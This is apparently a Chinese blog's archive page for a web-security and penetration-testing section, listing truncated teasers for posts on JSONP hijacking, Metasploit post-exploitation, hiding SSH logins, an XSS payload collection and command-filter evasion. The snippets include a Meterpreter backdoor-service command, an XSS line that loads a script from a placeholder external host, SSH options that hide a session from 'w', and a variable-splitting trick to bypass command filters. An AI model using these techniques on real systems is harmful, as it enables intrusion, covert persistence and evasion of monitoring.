jsonp跨域劫持姿势
利用场景:
对于本域的某接口要回调外域的参数时,对回调的referer值无任何校验.方可利用.例如:http://xxx.xxxx.xxxx/index?callback=http://xxx.xxx.xxx&xxx=1有ca...
阅读全文
Archive
Web安全与渗透
msf 常用渗透模块----POST
创建服务作为后门meterpreter > run metsvc查看目标主机的内网IP段情况meterpreter > run get_local_subnets添加路由表和对应的sessionroute add 1...
阅读全文
linux隐身登录技巧
方法1:隐藏的远程登录(w 看不到)ssh -T user @ host
登录后执行:/bin/bash -i
然后就可以执行bash命令了,执行w看,登录是空的。方法2:隐藏的远程登录(w 看不到)ssh -o UserKnow...
阅读全文
XSS Playload 集合
更新时间:2017年03月16日javascript:s=document.createElement('script');s.src='http://www.xxx.com/xss.js';document.body.appendC...
阅读全文
命令执行限制绕过小技巧
Linux 下:如果存在命令执行限制,或者执行命令无显示,不妨这样试试在bash命令中,用赋值方式绕过。例如:~$ a=w;b=h;c=o;d=a;e=m;f=i;$a$b$c$d$e$f
阅读全文